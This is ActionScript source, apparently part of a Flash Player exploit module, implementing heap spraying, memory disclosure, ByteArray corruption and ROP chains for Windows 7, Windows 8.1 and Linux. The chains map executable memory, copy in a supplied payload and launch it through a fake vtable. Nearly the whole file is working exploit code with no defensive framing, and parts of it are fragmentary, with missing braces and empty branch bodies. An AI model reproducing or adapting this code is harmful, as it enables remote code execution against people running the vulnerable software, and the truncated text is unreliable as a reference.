400 lines
16 KiB
400 lines
16 KiB
import flash.utils.ByteArray
import flash.system.System
public class Exploiter
private const VECTOR_OBJECTS_LENGTH:uint = 1014
private var exploit:Exploit
private var ev:ExploitVector
private var eba:ExploitByteArray
private var payload:ByteArray
private var platform:String
private var op_system:String
private var pos:uint
private var byte_array_object:uint
private var main:uint
private var stack_object:uint
private var payload_space_object:uint
private var buffer_object:uint
private var buffer:uint
private var vtable:uint
private var stack_address:uint
private var payload_address:uint
private var stack:Vector.<uint> = new Vector.<uint>(0x6400)
private var payload_space:Vector.<uint> = new Vector.<uint>(0x6400)
private var spray:Vector.<Object> = new Vector.<Object>(90000)
public function Exploiter(exp:Exploit, pl:String, os:String, p:ByteArray, uv:Vector.<uint>):void
exploit = exp
payload = p
platform = pl
op_system = os
ev = new ExploitVector(uv)
if (!ev.is_ready()) return
eba = new ExploitByteArray(platform)
try { pos = search_objects() } catch (err:Error) { ev.restore(); cleanup(); return; }
if (!disclose_objects()) { ev.restore(); cleanup(); return; }
if (!eba.is_ready()) { ev.restore(); cleanup(); return }
private function spray_objects():void
Logger.log("[*] Exploiter - spray_objects()")
for (var i:uint = 0; i < spray.length; i++)
spray[i] = new Vector.<Object>(VECTOR_OBJECTS_LENGTH)
spray[i][0] = eba.ba
spray[i][1] = exploit
spray[i][2] = stack
spray[i][3] = payload_space
private function search_objects():uint
Logger.log("[*] Exploiter - search_objects()")
var idx:uint = ev.search_pattern(VECTOR_OBJECTS_LENGTH, 0xac100)
return idx + 1
private function disclose_objects():Boolean
Logger.log("[*] Exploiter - disclose_objects()")
byte_array_object = ev.at(pos) - 1
main = ev.at(pos + 1) - 1
stack_object = ev.at(pos + 2) - 1
payload_space_object = ev.at(pos + 3) - 1
if (byte_array_object < 0x1000 || main < 0x1000 || stack_object < 0x1000 || payload_space_object < 0x1000) {
return false
return true
private function disclose_addresses():void
Logger.log("[*] Exploiter - disclose_addresses()")
if (platform == "linux")
buffer_object = ev.read(byte_array_object + 0x10)
buffer = ev.read(buffer_object + 0x1c)
else if (platform == "win")
buffer_object = ev.read(byte_array_object + 0x40)
buffer = ev.read(buffer_object + 8)
vtable = ev.read(main)
stack_address = ev.read(stack_object + 0x18)
payload_address = ev.read(payload_space_object + 0x18)
private function corrupt_byte_array():void
Logger.log("[*] Exploiter - corrupt_byte_array(): " + platform)
if (platform == "linux")
ev.write(buffer_object + 0x1c) // *array
ev.write(buffer_object + 0x20, 0xffffffff) // capacity
else if (platform == "win")
ev.write(buffer_object + 8) // *array
ev.write(buffer_object + 16, 0xffffffff) // capacity
private function restore_byte_array():void
Logger.log("[*] Exploiter - restore_byte_array(): " + platform)
if (platform == "linux")
ev.write(buffer_object + 0x1c, buffer) // *array
ev.write(buffer_object + 0x20, 1024) // capacity
else if (platform == "win")
ev.write(buffer_object + 8, buffer) // *array
ev.write(buffer_object + 16, 1024) // capacity
private function do_rop():void
Logger.log("[*] Exploiter - do_rop()")
if (platform == "linux") {
} else if (platform == "win") {
if (op_system == "Windows 8.1") {
} else if (op_system == "Windows 7") {
} else {
} else {
private function do_rop_windows():void
Logger.log("[*] Exploiter - do_rop_windows()")
var pe:PE = new PE(eba)
var flash:uint = pe.base(vtable)
var winmm:uint = pe.module("winmm.dll", flash)
var kernel32:uint = pe.module("kernel32.dll", winmm)
var ntdll:uint = pe.module("ntdll.dll", kernel32)
var virtualprotect:uint = pe.procedure("VirtualProtect", kernel32)
var virtualalloc:uint = pe.procedure("VirtualAlloc", kernel32)
var createthread:uint = pe.procedure("CreateThread", kernel32)
var memcpy:uint = pe.procedure("memcpy", ntdll)
var xchgeaxespret:uint = pe.gadget("c394", 0x0000ffff, flash)
var xchgeaxesiret:uint = pe.gadget("c396", 0x0000ffff, flash)
var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, ntdll)
// Continuation of execution
eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
eba.write(0, "\x89\x03", false) // mov [ebx], eax
eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
// Put the payload (command) in memory
eba.write(payload_address + 8, payload, true); // payload
// Put the fake vtabe / stack on memory
eba.write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability...
eba.write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call dword ptr [eax+0A4h]
eba.write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
eba.write(0, virtualprotect)
// VirtualProtect
eba.write(0, virtualalloc)
eba.write(0, buffer + 0x10)
eba.write(0, 0x1000)
eba.write(0, 0x40)
eba.write(0, buffer + 0x8) // Writable address (4 bytes)
// VirtualAlloc
eba.write(0, memcpy)
eba.write(0, 0x7f6e0000)
eba.write(0, 0x4000)
eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
// memcpy
eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
eba.write(0, 0x7f6e0000)
eba.write(0, payload_address + 8)
eba.write(0, payload.length)
// CreateThread
eba.write(0, createthread)
eba.write(0, buffer + 0x10) // return to fix things
eba.write(0, 0)
eba.write(0, 0)
eba.write(0, 0x7f6e0000)
eba.write(0, 0)
eba.write(0, 0)
eba.write(0, 0)
eba.write(main, stack_address + 0x18000) // overwrite with fake vtable
exploit.toString() // call method in the fake vtable
private function do_rop_windows8():void
Logger.log("[*] Exploiter - do_rop_windows8()")
var pe:PE = new PE(eba)
var flash:uint = pe.base(vtable)
var winmm:uint = pe.module("winmm.dll", flash)
var advapi32:uint = pe.module("advapi32.dll", flash)
var kernelbase:uint = pe.module("kernelbase.dll", advapi32)
var kernel32:uint = pe.module("kernel32.dll", winmm)
var ntdll:uint = pe.module("ntdll.dll", kernel32)
var virtualprotect:uint = pe.procedure("VirtualProtect", kernelbase)
var virtualalloc:uint = pe.procedure("VirtualAlloc", kernelbase)
var createthread:uint = pe.procedure("CreateThread", kernelbase)
var memcpy:uint = pe.procedure("memcpy", ntdll)
var xchgeaxespret:uint = pe.gadget("c394", 0x0000ffff, flash)
var xchgeaxesiret:uint = pe.gadget("c396", 0x0000ffff, flash)
var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, ntdll)
// Continuation of execution
eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
eba.write(0, "\x89\x03", false) // mov [ebx], eax
eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
// Put the payload (command) in memory
eba.write(payload_address + 8, payload, true); // payload
// Put the fake vtabe / stack on memory
eba.write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability...
eba.write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call dword ptr [eax+0A4h]
eba.write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
eba.write(0, virtualprotect)
// VirtualProtect
eba.write(0, virtualalloc)
eba.write(0, buffer + 0x10)
eba.write(0, 0x1000)
eba.write(0, 0x40)
eba.write(0, buffer + 0x8) // Writable address (4 bytes)
// VirtualAlloc
eba.write(0, memcpy)
eba.write(0, 0x7ffd0000)
eba.write(0, 0x4000)
eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
// memcpy
eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
eba.write(0, 0x7ffd0000)
eba.write(0, payload_address + 8)
eba.write(0, payload.length)
// CreateThread
eba.write(0, createthread)
eba.write(0, buffer + 0x10) // return to fix things
eba.write(0, 0)
eba.write(0, 0)
eba.write(0, 0x7ffd0000)
eba.write(0, 0)
eba.write(0, 0)
eba.write(0, 0)
eba.write(main, stack_address + 0x18000) // overwrite with fake vtable
exploit.toString() // call method in the fake vtable
private function do_rop_linux():void
Logger.log("[*] Exploiter - do_rop_linux()")
var flash:Elf = new Elf(eba, vtable)
var feof:uint = flash.external_symbol('feof')
var libc:Elf = new Elf(eba, feof)
var popen:uint = libc.symbol("popen")
var mprotect:uint = libc.symbol("mprotect")
var mmap:uint = libc.symbol("mmap")
var clone:uint = libc.symbol("clone")
var xchgeaxespret:uint = flash.gadget("c394", 0x0000ffff)
var xchgeaxesiret:uint = flash.gadget("c396", 0x0000ffff)
var addesp2cret:uint = flash.gadget("c32cc483", 0xffffffff)
// Continuation of execution
// 1) Recover original vtable
eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
eba.write(0, "\x89\x03", false) // mov [ebx], eax
// 2) Recover original stack
eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi
// my_memcpy
eba.write(buffer + 0x60, "\x56", false) // push esi
eba.write(0, "\x57", false) // push edi
eba.write(0, "\x51", false) // push ecx
eba.write(0, "\x8B\x7C\x24\x10", false) // mov edi,[esp+0x10]
eba.write(0, "\x8B\x74\x24\x14", false) // mov esi,[esp+0x14]
eba.write(0, "\x8B\x4C\x24\x18", false) // mov ecx,[esp+0x18]
eba.write(0, "\xF3\xA4", false) // rep movsb
eba.write(0, "\x59", false) // pop ecx
eba.write(0, "\x5f", false) // pop edi
eba.write(0, "\x5e", false) // pop esi
eba.write(0, "\xc3", false) // ret
// Put the popen parameters in memory
eba.write(payload_address + 0x8, payload, true) // false
// Put the fake stack/vtable on memory
eba.write(stack_address + 0x18024, xchgeaxespret) // Initial gadget, stackpivot
eba.write(stack_address + 0x18000, xchgeaxesiret) // Save original stack on esi
eba.write(0, addesp2cret) //second pivot to preserver stack_address + 0x18024
// Return to mprotect()
eba.write(stack_address + 0x18034, mprotect)
// Return to stackpivot (jmp over mprotect parameters)
eba.write(0, addesp2cret)
// mprotect() arguments
eba.write(0, buffer) // addr
eba.write(0, 0x1000) // size
eba.write(0, 0x7) // PROT_READ | PROT_WRITE | PROT_EXEC
// Return to mmap()
eba.write(stack_address + 0x18068, mmap)
// Return to stackpivot (jmp over mmap parameters)
eba.write(0, addesp2cret)
// mmap() code segment arguments
eba.write(0, 0x70000000) // 0x70000000
eba.write(0, 0x4000) // size
eba.write(0, 0x7) // PROT_READ | PROT_WRITE | PROT_EXEC
eba.write(0, 0x22) // MAP_PRIVATE | MAP_ANONYMOUS
eba.write(0, 0xffffffff) // filedes
eba.write(0, 0) // offset
// Return to mmap()
eba.write(stack_address + 0x1809c, mmap)
// Return to stackpivot (jmp over mmap parameters)
eba.write(0, addesp2cret)
// mmap() stack segment arguments
eba.write(0, 0x70008000) // NULL
eba.write(0, 0x10000) // size
eba.write(0, 0x7) // PROT_READ | PROT_WRITE | PROT_EXEC
eba.write(0, 0x22) // MAP_PRIVATE | MAP_ANONYMOUS
eba.write(0, -1) // filedes
eba.write(0, 0) // offset
// Return to memcpy()
eba.write(stack_address + 0x180d0, buffer + 0x60)
// Return to stackpivot (jmp over memcpy parameters)
eba.write(0, addesp2cret)
// memcpy() parameters
eba.write(0, 0x70000000)
eba.write(0, payload_address + 0x8)
eba.write(0, payload.length)
// Return to clone()
eba.write(stack_address + 0x18104, clone)
// Return to CoE (fix stack and object vtable)
eba.write(0, buffer + 0x10)
// clone() arguments
eba.write(0, 0x70000000) // code
eba.write(0, 0x7000bff0) // stack
eba.write(0, 0x00000100) // flags CLONE_VM
eba.write(0, 0) // args
//call DWORD PTR [eax+0x24]
//EAX: 0x41414141 ('AAAA')
//EDI: 0xad857088 ("AAAA\377")
eba.write(main, stack_address + 0x18000)
private function cleanup():void
Logger.log("[*] Exploiter - cleanup()")
spray = null
stack = null
payload_space = null
eba = null
ev = null
exploit = null